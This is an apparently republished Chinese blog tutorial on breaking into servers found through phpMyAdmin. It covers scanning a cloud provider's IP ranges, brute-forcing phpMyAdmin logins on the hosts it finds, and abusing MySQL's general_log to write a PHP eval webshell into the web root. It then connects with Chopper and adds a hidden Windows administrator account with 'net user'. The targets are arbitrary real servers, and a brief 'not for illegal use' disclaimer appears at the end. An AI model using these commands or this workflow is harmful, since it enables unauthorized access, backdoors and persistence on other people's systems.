39

phpmyadmin从找目标到拿下服务器

 5 years ago
source link: http://www.10tiao.com/html/665/201807/2650448315/3.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.


前段时间写了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号root密码这种弱口令,今天给大家来一套完整的教学。


首先百度XX云X地区的IP段(你要是连几个国内云服务运营商的名字都不知道,那我就真的没办法了)。


 


找到以后百度随便找个工具扫描IP段,大的运营商一般直接后两个大段都是他的


然后找到IP段以后直接找一个80端口批量扫描的工具扫80端口,直接扫两个大段


我用的这个叫S-Xing,百度来的,不知道有没有后门,所以就不提供了


   


扫描好以后导入刚才扫描好的IP


 


然后选择自动后缀


 


线程根据自己配置来配置,我直接选择最高500,然后开始爆破


 


爆破结果


 


随便选择一个开搞


先看一下服务器信息xx.xx.xx.xx/l.php


 

网站路径什么的都爆出来了,登录后台


 

老规矩,查下mysql日志文件路径


 

先修改日志路径到当前网站路径,在开启日志,并插入一句话木马,然后关闭日志


SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php'; 


修改当前日志文件到网站目录下


set global general_log = "ON";                开启mysql记录日志

select '<?php eval($_POST[sean]);?>';   插入PHP        一句话木马

set global general_log = "OFF";              关闭mysql记录日志


 


执行成功


 

接下来上菜刀连接上传好的一句话木马



 

用net user admin$ sean2018.. /add & net localgroup administrators admin$ /add创建一个管理员账号

 

账号已存在,那就直接修改密码了,带$符号的都是被影藏账号,估计被日了多少次了吧


 


接下来连接试试


 


 

玩完,收工,文章内所有的工具,百度一搜索一大把,我也是百度来的,不知道有没有后门所以就不提供下载了,怕中毒找个虚拟机搞,自己折腾吧。


本文章只做教学思路,请勿用于非法用途

你可能喜欢

学习Metasploit溢出phpmyadmin漏洞

渗透机房(phpmyadmin拿shell)暴力破解phpmyadmin口令

phpmyadmin 命令执行


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK